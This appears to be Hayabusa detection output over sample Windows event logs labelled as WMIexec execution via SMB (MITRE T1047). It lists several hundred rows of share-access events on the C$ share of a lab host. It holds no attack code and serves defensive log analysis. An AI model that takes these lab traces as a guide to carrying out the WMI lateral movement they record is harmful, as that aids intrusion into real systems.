10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napsnap\5ab2511c5224a660e85286b3f2c2b752 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57#\cc32e4d4e4dfbff56d3ae35134c1f38e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8#\6a2929eeb7b5fa6ff9ef1b0f4ff440f1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67#\efd939ad16f7521ac6c0c15afdcb2fa2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64#\8bb4776b03f3c369fd0c81c51cf468ac : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\92388fbe99436e6ed1f56ee56f10c565 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe#\9bb6d55c49486153c1c1872929def220 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c#\373b26e93f287f3cda45a6282a1de0d3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b#\9551a2df153a961cbbcb79bca937a833 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877#\db7fe97a2a840dcc0278f7af89ea7fbe : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c#\be1a119716bb1de8469b568ec9e31d9c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca#\e1c86f334a29d92ca264950085cd817e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded#\8bda9cd4f7d015f685bae38300b2c281 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5#\276763baa173e2b94a6318e28594e7ee : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\619034abb9a9fb1b3dc32c0a9aa38d3c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI\e4b5f01da74352b18e1dffd68b611367 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework\8a1ed041bc25980a548a96cf4b78f4b6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413#\6f2318339b6bd916c3c62b95c91b305d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics\352d34797f7cd44cd0973c33539200f1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost\a4c49e23c0c23b5db4c663738eac897e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn\d82382933ba69165a4398eba2fb6c0b2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System\c24d08cc4e93fc4f6f15a637b00a2721 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628#\1a6ec0d19dfcc35f62014ff3602e6a54 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e#\86d8003fea61ae88dd34584f08a9393c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd#\a6af57d6c4eee4a8e0165604baa15b61 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities\16738205fa35676f5eda6d7d70169936 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354#\0a1d9187e911a67185317ffa7ee40ef0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn\14b968adbdb2082b1b938b20b5cb24b5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007#\10dd4c410de361a8ee03b5b7c662ccc9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404# : IP Address: 